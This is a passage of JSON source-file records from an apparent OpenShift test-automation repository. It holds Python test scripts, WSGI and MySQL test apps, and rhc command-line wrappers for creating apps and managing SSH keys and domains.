VMKdPcSXsBUvDGM\n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\n/w+9BQu2G5s85QAAAABJRU5ErkJggg==\\\">\n <h1>\n Welcome to OpenShift\n 
</h1>\n <p>\n Place your application here\n </p>\n <p>\n In order to commit to your new project, go to your projects git repo (created with the rhc-create-app command). Make your changes, then run:\n </p>\n <pre>\n git commit -a -m 'Some commit message'\n git push\n </pre>\n <p>\n Then reload this page.\n </p>\n \n <h2>\n What's next?\n </h2>\n <ul>\n <li>\n Why not visit us at <a href=\\\"http://openshift.redhat.com\\\">http://openshift.redhat.com</a>, or\n </li>\n <li>\n You could get help in the <a href=\\\"http://www.redhat.com/openshift\\\">OpenShift forums</a>, or\n </li>\n <li>\n You're welcome to come chat with us in our IRC channel at #openshift on freenode.net\n </li>\n </ul>\n</body>\n</html>\n\"]]\n end\n run welcome\nend\n" }, { "alpha_fraction": 0.5889724493026733, "alphanum_fraction": 0.6152881979942322, "avg_line_length": 26.44827651977539, "blob_id": "e36523ea01bcfaa5d5a17be2b659777e47933946", "content_id": "5ccf58e351d77e4d9cb47c1f990f1f56bbf3472f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 798, "license_type": "no_license", "max_line_length": 110, "num_lines": 29, "path": "/automation/open/lib/supports/XML/doctype.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\n\n<http://www.w3.org/TR/2000/REC-xml-20001006#sec-prolog-dtd>\n\nXXX needs work\n\n\"\"\"\n\n#[28] doctypedecl ::= '<!DOCTYPE' S Name (S ExternalID)? S? ('[' (markupdecl | DeclSep)* ']' S?)? '>'\n#[28a] DeclSep ::= PEReference | S [WFC: PE Between Declarations]\n#[29] markupdecl ::= elementdecl | AttlistDecl | EntityDecl | NotationDecl | PI | Comment\n\n\nclass Doctype(object):\n\tdef __init__(self, name, public, system=\"\"):\n\t\tself.name = name\n\t\tself.publicid = public\n\t\tself.system = system\n\tdef __str__(self):\n\t\treturn '<!DOCTYPE %s PUBLIC \"%s\" SYSTEM \"%s\">' % (self.name, self.publicid, self.system)\n\ndef get_doctype(name, public, system=\"\"):\n\treturn Doctype(name, public, system)\n\n\n" }, { "alpha_fraction": 0.6449235677719116, "alphanum_fraction": 0.6509279608726501, "avg_line_length": 39.263736724853516, "blob_id": "89ca51194b328df12dbfffd972043e2a33d5394f", "content_id": "1dc90ee4136297c794679f8662885f4114cf5c88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3664, "license_type": "no_license", "max_line_length": 103, "num_lines": 91, "path": "/automation/open/testmodules/UI/web/tc_userlanding.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\nclass UserLanding(unittest.TestCase):\n\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n \n def test_aa_go_to_a_dashboard_nonauth(self):\n self.driver.get(config.dashboard_path)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n\n def test_ab_go_to_b_controlpanel_noauth(self):\n self.driver.get(config.control_panel)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n\n def test_ac_go_to_c_flex_console_noauth(self):\n if config.proxy:\n self.driver.get(config.flex_console)\n 
baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n else:pass\n \n def test_d_login_from_registr_page(self):\n self.driver.get(config.registration_page)\n time.sleep(3)\n baseutils.go_to_signin(self)\n baseutils.login_by_window(self,config.granted_user[0],config.granted_user[1])\n time.sleep(3)\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n \n def test_e_login_from_flex_registr_page(self):\n self.driver.get(config.flex_registration_page)\n time.sleep(3)\n baseutils.go_to_signin(self)\n baseutils.login_by_window(self,config.granted_user[0],config.granted_user[1])\n time.sleep(3)\n baseutils.check_title(self,\"OpenShift by Red Hat | Flex\")\n \n def test_f_login_from_express_registr_page(self):\n self.driver.get(config.express_registration_page)\n time.sleep(3)\n baseutils.go_to_signin(self)\n baseutils.login_by_window(self,config.granted_user[0],config.granted_user[1])\n time.sleep(3)\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n '''\n def test_ae_login_from_dashboard(self):\n self.driver.get(config.dashboard_path)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n baseutils.scroll_bar(self)\n self.driver.refresh()\n baseutils.login_by_form(self,config.granted_user[0],config.granted_user[1])\n time.sleep(2)\n baseutils.assert_text_equal_by_css(self,\"Control Panel\",\"section.main > header > h1\")\n \n def test_af_login_from_control_panel(self):\n self.driver.get(config.control_panel)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n baseutils.scroll_bar(self)\n self.driver.refresh()\n baseutils.login_by_form(self,config.granted_user[0],config.granted_user[1])\n time.sleep(2)\n baseutils.assert_text_equal_by_css(self,\"Control Panel\",\"section.main > header > h1\")\n \n def test_c_login_from_flex_console(self):\n if config.proxy:\n self.driver.get(config.flex_console)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n baseutils.scroll_bar(self)\n self.driver.refresh()\n baseutils.login_by_form(self,config.granted_user[0],config.granted_user[1])\n self.assertTrue(config.flex_console in self.driver.current_url,\"flex console is not right\")\n else:pass\n ''' \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n \n\nif __name__ == \"__main__\":\n unittest.main()\n #HTMLTestRunner.main()\n" }, { "alpha_fraction": 0.6065573692321777, "alphanum_fraction": 0.6305170059204102, "avg_line_length": 21.628570556640625, "blob_id": "5bb431ce3c658086520b703ef2235c3593b9fba8", "content_id": "29ce2ef29162ecbc1406aeecf78ba8abefda17a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "no_license", "max_line_length": 85, "num_lines": 35, "path": "/automation/open/bin/reset_testrun.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n'''\n File name: reset_testrun.py\n Date: 2012/06/08 11:43\n Author: [email protected]\n'''\n\nimport sys\nimport os\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\ntestmodules_path = os.path.abspath(file_path + \"/../testmodules\")\nsys.path.append(lib_path)\nsys.path.append(lib_path + \"/supports\")\nsys.path.append(testmodules_path)\nfrom tcms import TCMS\n\n\ndef main():\n if (len(sys.argv)<2):\n print \"ERROR: Usage python %s <TESTRUN_ID> [state1, state2, ...]\"%sys.argv[0]\n sys.exit(2)\n\n 
sys.argv.pop(0)\n testrun_id=int(sys.argv.pop(0))\n state = sys.argv\n tcmsobj = TCMS()\n return tcmsobj.reset_testrun(testrun_id, state)\n\n\nif __name__ == \"__main__\":\n main()\n\n# end of reset_testrun.py \n" }, { "alpha_fraction": 0.5401397943496704, "alphanum_fraction": 0.5490362048149109, "avg_line_length": 36.16535568237305, "blob_id": "61c1824a98abfe160a859275cd39c7426163828d", "content_id": "b57ee8c4c9a1b47e3fe397eb3934b1426abed553", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4721, "license_type": "no_license", "max_line_length": 172, "num_lines": 127, "path": "/automation/open/testmodules/RT/cartridge/cron_embed.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: cron_embed.py\n# Date: 2012/02/13 10:32\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport time\nimport pexpect\n\nimport testcase, common, OSConf\nimport rhtest\n# user defined packages\nimport openshift\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary=\"[US648][Runtime][rhc-cartridge] Embedded Cron support\"\n self.app_name = common.getRandomString(10)\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `python` as default\")\n self.test_variant = 'python'\n self.app_type = common.app_types[self.test_variant]\n self.tcms_testcase_id = 130918\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass CronEmbed(OpenShiftTest):\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\"Create a sample application\" ,\n common.create_app,\n function_parameters = [self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Embed cron\",\n common.embed,\n function_parameters = [self.app_name, \n \"add-%s\"%(common.cartridge_types['cron']), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return = 0,\n expect_description = \"Embedding Cron should work.\"))\n\n self.steps_list.append(testcase.TestCaseStep(\"Create a new cron job\",\n '''\n cd %s &&\n mkdir -p .openshift/cron/minutely &&\n echo 'date +%%T@%%F >> $OPENSHIFT_DATA_DIR/date.txt' > .openshift/cron/minutely/date.sh &&\n git add .openshift/cron/minutely/date.sh &&\n git commit -m \"added new cron job\" -a &&\n git push\n '''%self.app_name,\n expect_description=\"Definying new cron task should work.\",\n expect_return = 0))\n\n def check_the_cron(self):\n self.info(\"Waiting for a minute to get some results from cron...\")\n uuid = OSConf.get_app_uuid(self.app_name)\n app_url = OSConf.get_app_url(self.app_name)\n time.sleep(65)\n p = pexpect.spawn('ssh -t -o ConnectTimeout=20 %s@%s \"cat $OPENSHIFT_DATA_DIR/date.txt\"' % (uuid, app_url))\n p.wait()\n try:\n ret = p.expect(\"\\d{2}:\\d{2}:\\d{2}@\\d{4}-\\d{2}-\\d{2}\")\n return ret\n except pexpect.TIMEOUT, e:\n print \"Failed to find data generated by cron job. %s\" % (e)\n except pexpect.EOF, e:\n print \"Failed to find data generated by cron job. 
%s\" % (e)\n return 1\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify it\",\n check_the_cron,\n function_parameters = [self],\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Stop cron...\",\n \"rhc cartridge stop %s -a %s -l %s -p '%s' %s\"\n %(common.cartridge_types['cron'], self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Start cron...\",\n \"rhc cartridge start %s -a %s -l %s -p '%s' %s\"\n %(common.cartridge_types['cron'], self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return = 0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CronEmbed)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of cron_embed.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6366251111030579, "alphanum_fraction": 0.6471716165542603, "avg_line_length": 28.799999237060547, "blob_id": "12b5a9e5d5842ca2bf60dceadfadcdf5f62b7d9e", "content_id": "469c1c9d7b1e7646dc05afb99b6014a7b35362fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1043, "license_type": "no_license", "max_line_length": 91, "num_lines": 35, "path": "/automation/open/testmodules/RT/cartridge/app_template/https/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os.path\nimport os\nimport sys\n\ntry:\n __file__\nexcept NameError:\n __file__ = '?'\n\n\ndef application(environ, start_response):\n \"\"\" The WSGI test application \"\"\"\n # emit status / headers\n status = \"200 OK\"\n headers = [('Content-Type', 'text/html'), ]\n start_response(status, headers)\n\n # assemble and return content\n return [environ[\"HTTP_X_FORWARDED_PROTO\"]]\n\n\nif __name__ == '__main__':\n # this runs when script is started directly from commandline\n try:\n # create a simple WSGI server and run the application\n from wsgiref import simple_server\n print \"Running test application - point your browser at http://localhost:8000/ ...\"\n httpd = simple_server.WSGIServer(('', 8000), simple_server.WSGIRequestHandler)\n httpd.set_app(application)\n httpd.serve_forever()\n except ImportError:\n # wsgiref not installed, just output html to stdout\n for content in application({}, lambda status, headers: None):\n print content\n" }, { "alpha_fraction": 0.5832699537277222, "alphanum_fraction": 0.5896071195602417, "avg_line_length": 45.96428680419922, "blob_id": "fdf04ce131e4318b2a43c1273d002187ffbbf81c", "content_id": "2fecb11886965e28f3338d040d8c47aba564c446", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3945, "license_type": "no_license", "max_line_length": 244, "num_lines": 84, "path": "/automation/open/prepare_testing_data/data/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": 
"#!/usr/bin/python\nimport os\nimport commands\nfrom cgi import escape\nfrom urlparse import parse_qs\nimport MySQLdb\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \n\ndef application(environ, start_response):\n parameters = parse_qs(environ.get('QUERY_STRING', ''))\n ctype = 'text/plain'\n con=MySQLdb.connect(host=\"#host\",user=\"#user\",passwd=\"#passwd\",db=\"#dbname\",port=#port)\n cursor = con.cursor()\n cursor.execute('CREATE TABLE IF NOT EXISTS info(id INT NOT NULL AUTO_INCREMENT, data CHAR(200), PRIMARY KEY (id));')\n con.commit()\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s: %s' % (key, value)\n for key, value in sorted(environ.items())]\n response_body = '\\n'.join(response_body)\n elif environ['PATH_INFO'] == '/insert':\n if 'size' in parameters:\n size = int(escape(parameters['size'][0]))\n else:\n size = 5000\n cursor.execute('SET autocommit=0;')\n for i in range(size):\n cursor.execute('INSERT INTO info VALUES(NULL, \"This is testing data for testing snapshoting and restoring big data in mysql database.This is testing data for testing snapshoting and restoring big data in mysql database.\");')\n cursor.execute('COMMIT;')\n cursor.execute('SET autocommit=1;')\n response_body = '''Gear DNS: %s\nSQL statements: \nINSERT INTO info VALUES(NULL, 'This is testing data for testing snapshoting and restoring big data in mysql database.This is testing data for testing snapshoting and restoring big data in mysql database.');\n%s records have been inserted into mysql''' % (os.environ['OPENSHIFT_GEAR_DNS'], size)\n elif environ['PATH_INFO'] == '/delete':\n cursor.execute('DELETE FROM info;');\n response_body = 'Gear DNS: %s\\nAll the records have been deleted from mysql database' % (os.environ['OPENSHIFT_GEAR_DNS'])\n elif environ['PATH_INFO'] == '/show':\n cursor.execute('SELECT COUNT(*) FROM info;')\n try:\n count = int(cursor.fetchone()[0])\n cursor.execute('SELECT * FROM info LIMIT 0, 1;')\n row = cursor.fetchone()\n except:\n count = 0\n response_body = 'Gear DNS: %s\\n' % (os.environ['OPENSHIFT_GEAR_DNS'])\n if count == 0:\n response_body += 'There is no record in database'\n else:\n response_body += 'There are %d records in database.\\nHere is one row:\\n%s\\n' % (count, row)\n else:\n ctype = 'text/plain'\n response_body = '''[rhc-cartridge]snapshot/restore big mysql data to existing app\\n[rhc-cartridge]snapshot/restore big mysql data to new app\\n'''\n\n cursor.execute('COMMIT;')\n cursor.close()\n con.commit()\n con.close()\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()\n" }, { "alpha_fraction": 0.48575711250305176, "alphanum_fraction": 0.4899217188358307, "avg_line_length": 39.1505012512207, "blob_id": "93a0cba542ddfbdaff3bd197ca9b9fb9ccbc954b", 
"content_id": "9a9868d0fa951cd2e8e987a08e8cfc9f5d315ba4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12006, "license_type": "no_license", "max_line_length": 119, "num_lines": 299, "path": "/automation/open/lib/common/client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from consts import *\nfrom misc import *\nimport time, os, re\nimport OSConf\nimport openshift #rest api\nimport shutil\n\n#\n# All of the rhc-client helpers\n#\n\ndef create_app(app_name, app_type, user_email=None, user_passwd=None,\n clone_repo=True, git_repo=\"./\", scalable=False,\n gear_size = \"small\", timeout=None,\n disable_autoscaling=True):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n if clone_repo == True:\n if git_repo == \"./\":\n options = \"\"\n cmd = \"ls %s\" % (app_name)\n else:\n options = \"-r %s\" %(git_repo)\n cmd = \"ls %s\" % (git_repo)\n else:\n options = \"--no-git\"\n cmd = \"true\"\n try:\n if os.path.exists(app_name):\n shutil.rmtree(app_name)\n except:\n pass\n\n cmd = (\"rhc app create %s %s -l %s -p %s\"\n \" %s %s\")% (app_name, app_type,\n user_email, user_passwd, \n options, RHTEST_RHC_CLIENT_OPTIONS)\n if scalable:\n cmd += \" -s \"\n\n if gear_size != \"small\":\n cmd += \" -g %s \" % ( gear_size )\n\n (ret, output) = command_getstatusoutput(cmd, quiet=False)\n\n if ret == 0:\n if not isDNS(output):\n OSConf.add_app(app_name, app_type, output)\n else:\n log.info(\"DNS issue - try to update cache via REST API\")\n OSConf.add_app(app_name, app_type, output)\n else:\n print \"ERROR!\\n\",output\n if is500(output): #or isDNS(output):\n raise MercyException(\"500\")\n return ret\n\n if scalable and disable_autoscaling:\n if clone_repo:\n touch(os.path.join(app_name,\".openshift/markers/disable_auto_scaling\"))\n cmd = \"cd %s && git add . 
&& git commit -amt && git push\" % (app_name)\n log.debug(\"Disabling autoscaling...\")\n (retcode, output) = command_getstatusoutput(cmd, quiet = True)\n if retcode != 0:\n log.error(\"Unable to disable autoscaling: %s\"%output)\n else:\n log.warning(\"Unable to disable autoscaling->disabled clone_repo\")\n if app_type == app_types['jenkins']:\n print 'Waiting for jenkins server to get ready...'\n time.sleep(30)\n return ret\n\n\ndef create_scalable_app(app_name, app_type, user_email=None, user_passwd=None, \n clone_repo=True, git_repo=\"./\", gear_size=\"small\", \n disable_autoscaling=True):\n\n return create_app(app_name, app_type, user_email=user_email,\n user_passwd=user_passwd, clone_repo=clone_repo,\n git_repo=git_repo, scalable=True, gear_size=gear_size,\n disable_autoscaling=disable_autoscaling)\n\n\ndef stop_app(app_name, user_email, user_passwd):\n cmd = \"rhc app stop %s -l %s -p %s %s\"% (app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n return ret\n\n\ndef start_app(app_name, user_email, user_passwd):\n cmd = \"rhc app start %s -l %s -p %s %s\"% (app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n return ret\n\n\ndef force_stop_app(app_name, user_email, user_passwd):\n cmd = \"rhc app force-stop %s -l %s -p %s %s\"% (app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n return ret\n\n\ndef restart_app(app_name, user_email, user_passwd):\n cmd = \"rhc app restart %s -l %s -p %s %s\"% (app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n return ret\n\n\ndef reload_app(app_name, user_email, user_passwd):\n cmd = \"rhc app reload %s -l %s -p %s %s\"% (app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n return ret\n\n\ndef embed(app_name, embed_cart, user_email=None, user_passwd=None):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n obj = re.search(r\"(^[^-]+)-(.*)\", embed_cart)\n action = obj.group(1)\n embed_cart = obj.group(2)\n cmd = \"rhc cartridge %s %s -a %s -l %s -p '%s' %s\" % (action, \n embed_cart, \n app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n if action == \"remove\":\n cmd += \" --confirm\"\n (ret, output) = command_getstatusoutput(cmd)\n\n if ret == 0:\n try:\n ret2 = OSConf.update_embed(app_name, action, embed_cart, output)\n if ret2 != 0:\n log.error(\"Unable to cache embedded info.\")\n except Exception, e:\n log.error(\"Unable to cache embedded info: %s\"% e)\n else:\n log.error(output)\n #if is500(output): # or isDNS(output):\n #raise MercyException(\"500\")\n return ret\n\n\n#@repeat_if_failure\ndef destroy_app(app_name, user_email=None, user_passwd=None, clean_repo=False, git_repo=\"./\"):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n if git_repo == \"./\":\n git_repo = app_name\n\n cmd = \"rhc app delete %s -l %s -p '%s' --confirm %s\"% (app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n\n (ret, output) = command_getstatusoutput(cmd, quiet=True)\n if clean_repo == True and os.path.exists(git_repo):\n shutil.rmtree(git_repo)\n\n if ret == 0:\n OSConf.remove_app(app_name)\n else:\n print output\n if is500(output) or isDNS(output):\n pass\n #raise MercyException(\"500 or DNS\")\n return ret\n\n\ndef 
add_sshkey(key_filepath=\"~/.ssh/id_rsa.pub\", key_name=\"default\", user_email=None, user_passwd=None, options=\"\"):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n cmd = 'rhc sshkey add %s %s -l %s -p %s %s %s'% (key_name,\n key_filepath,\n user_email,\n user_passwd,\n options,\n RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n if ret == 0:\n cmd = \"ssh-keygen -lf %s\" % (key_filepath)\n (ret, output) = command_getstatusoutput(cmd, quiet=True)\n try:\n pattern = re.compile(r'\\d+ ([\\w:]+) .*\\(([DR]SA)\\)')\n match_obj = pattern.search(output)\n fingerprint = match_obj.group(1)\n key_type = match_obj.group(2).lower()\n ret2 = OSConf.add_sshkey(key_name, key_type, fingerprint)\n if ret2 != 0:\n print \"Warning: Failed to add ssh key to OSConf\"\n except:\n print \"Warning: Failed to add ssh key to OSConf\"\n else:\n print output\n return ret\n\n\ndef remove_sshkey(key_name=\"default\", user_email=None, \n user_passwd=None, options=\"\"):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n cmd = (\"rhc sshkey remove %s -l %s -p '%s' \"\n \" %s %s\")% (key_name, user_email, user_passwd, \n options, RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n if ret == 0:\n ret2 = OSConf.remove_sshkey(key_name)\n if ret2 != 0:\n print \"Warning: Failed to remove ssh key from OSConf\"\n else:\n print output\n return ret\n\ndef update_sshkey(key_filepath=\"~/.ssh/id_rsa.pub\", key_name=\"default\", user_email=None, user_passwd=None, options=\"\"):\n '''Since there's no 'rhc sshkey update' now, this function is only used to make sure ssh key is correctly set'''\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n ret = remove_sshkey(key_name, user_email, user_passwd)\n if ret != 0:\n print \"Failed to remove key %s: %s\" % (key_name, key_filepath)\n ret = add_sshkey(key_filepath, key_name, user_email, user_passwd)\n if ret == 0:\n cmd = \"ssh-keygen -lf %s\" % (key_filepath)\n (ret, output) = command_getstatusoutput(cmd, quiet=True)\n try:\n pattern = re.compile(r'\\d+ ([\\w:]+) .*\\(([DR]SA)\\)')\n match_obj = pattern.search(output)\n fingerprint = match_obj.group(1)\n key_type = match_obj.group(2).lower()\n OSConf.update_sshkey(key_name, key_type, fingerprint)\n except:\n print \"Warning: Failed to update the ssh key stored in OSConf\"\n else:\n print \"Failed to add ssh key %s: %s\" % (key_name, key_filepath)\n return ret\n\ndef create_domain(domain_name, user_email=None, user_passwd=None, options=\"\"):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n print domain_name\n cmd = 'rhc domain create %s -l %s -p \"%s\" %s %s'% (domain_name,\n user_email, \n user_passwd, \n options,\n RHTEST_RHC_CLIENT_OPTIONS)\n ret = command_get_status(cmd)\n if ret == 0:\n OSConf.initial_conf()\n return ret\n\n\ndef alter_domain(domain_name, user_email=None, user_passwd=None, options=\"\"):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n old_domain = get_domain_name(user_email, user_passwd)\n cmd = 'rhc domain update %s %s -l %s -p \"%s\" %s %s'% (old_domain,\n domain_name,\n user_email, \n user_passwd, \n options,\n RHTEST_RHC_CLIENT_OPTIONS)\n ret = command_get_status(cmd)\n if ret == 0:\n OSConf.alter_domain(domain_name)\n return ret\n\n\ndef fix_domain(domain_name, user_email=None, user_passwd=None):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n\n cmd = 'rhc domain show -l %s -p \"%s\"'% 
